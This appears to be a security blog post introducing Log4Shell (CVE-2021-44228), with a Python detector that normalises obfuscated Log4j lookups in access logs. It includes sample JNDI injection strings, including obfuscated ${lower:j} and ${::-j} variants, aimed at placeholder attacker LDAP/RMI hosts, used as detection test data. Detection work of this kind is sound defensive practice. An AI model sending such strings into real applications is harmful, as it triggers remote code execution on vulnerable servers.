On November 24th, 2021, Chen Zhaojun, a security researcher on Alibaba's Cloud Security Team, notified the Apache Software Foundation of a critical vulnerability in its Log4j library. Weeks later, the vulnerability, known as Log4Shell (CVE-2021-44228), took the world by storm. With Log4j embedded in a huge number of internet-facing Java applications, we're opening a three-part series covering an overview of the vulnerability, how to exploit it, and most importantly, how to defend against it.
Log4j is an open-source logging library developed by the Apache Software Foundation and used by countless Java applications around the world. Developers use Log4j to record information about application activity, such as access timestamps, user details, and error reports.
In late November, Alibaba Cloud Security researchers discovered that Log4j 2 (versions 2.0-beta9 through 2.14.1) was susceptible to Remote Code Execution (RCE) through a class of vulnerability known as Java Naming and Directory Interface (JNDI) injection. For background on JNDI injection, we recommend Alvaro Muñoz and Oleksandr Mirosh's presentation at Black Hat USA 2016. As a general overview: Log4j performs "lookups", substituting expressions of the form ${prefix:value} inside the text it logs. An attacker places a JNDI lookup string such as ${jndi:ldap://<attacker-host>/a} into any request field the application logs (a User-Agent header, a username, a search term). When Log4j logs that string, it resolves the lookup, connecting to the attacker-controlled LDAP (or RMI) server, which answers with a reference to a Java class hosted by the attacker. The vulnerable application fetches and instantiates that remote class, running the attacker's code, hence the RCE. The diagram below illustrates the exploitation of the Log4j vulnerability and how to prevent it (in green):
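To make the lookup mechanism concrete, here is an added example (not code from the original article, and not Log4j's own implementation) that models, in a simplified form, how vulnerable Log4j 2.x resolved nested lookups, and uses that model to recognise Log4Shell probes in web-server access logs. Only the lookups attackers used for obfuscation are modelled (${lower:...}, ${upper:...} and the ${key:-default} fallback); the log lines and the 203.0.113.x addresses are constructed for the example.

```python
"""Toy model of Log4j 2 lookup substitution, used to recognise Log4Shell
probes in log lines.  Added example for this article: it is not Log4j's
code and deliberately models only the lookups used for obfuscation."""
import re

# Innermost ${...} expression: a body containing no nested '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved lookup that would make Log4j call JNDI: scheme and host:port.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def _resolve_one(body):
    """Resolve one non-JNDI lookup body the way vulnerable Log4j 2.x did.

    Modelled pieces (the ones seen in obfuscated payloads):
      ${lower:X} / ${upper:X}   case conversion of X
      ${key:-default}           default value when 'key' cannot be resolved
    Anything else returns None and is left untouched so it stays visible.
    """
    if ":-" in body:
        # ${::-j} and ${env:NOPE:-j} both fall back to the default text "j".
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep:
        if prefix.lower() == "lower":
            return arg.lower()
        if prefix.lower() == "upper":
            return arg.upper()
    return None


def normalize(text, max_rounds=16):
    """Resolve innermost lookups repeatedly until the string stops changing.

    ${jndi:...} itself is never resolved, so the payload surfaces in clear
    text instead of hiding behind nested ${lower:..} / ${::-..} fragments.
    """
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            body = m.group(1)
            if body.lstrip().lower().startswith("jndi:"):
                return m.group(0)          # keep the JNDI lookup intact
            resolved = _resolve_one(body)
            if resolved is None:
                return m.group(0)          # unknown lookup, leave as-is
            changed = True
            return resolved

        text = _INNER.sub(repl, text)
        if not changed:
            break
    return text


def jndi_target(line):
    """Return (scheme, host:port) of the JNDI lookup a line would trigger, else None."""
    m = _JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines):
    """Return [(line_number, scheme, host:port)] for lines carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        target = jndi_target(line)
        if target:
            hits.append((n, *target))
    return hits


# Constructed access-log lines (RFC 5737 addresses), not real traffic.  The
# attacker-controlled string sits in the User-Agent field, which most
# applications log verbatim.
SAMPLE_LOGS = [
    '203.0.113.7 - - [10/Dec/2021:13:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/94.0"',
    '203.0.113.7 - - [10/Dec/2021:13:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:13:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:13:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/x}"',
    '203.0.113.7 - - [10/Dec/2021:13:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${env:HOME} is a lookup, but not a JNDI one"',
]

if __name__ == "__main__":
    for n, scheme, host in scan(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup via {scheme} to {host}")
```

The point of normalising before matching is that a naive search for the literal text `${jndi:` misses lines 3 and 4, even though vulnerable Log4j resolves both of them to exactly the same lookup as line 2. Real Log4j supports many more lookups (env, sys, date, ctx and others), and attackers also URL-encode or split payloads across fields, so a production detector has to cover those as well; this model only shows the substitution behaviour that makes the attack work.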
How is Log4Shell actually exploited, and what can we do to defend against it? Tune in next week for the next installment of the series.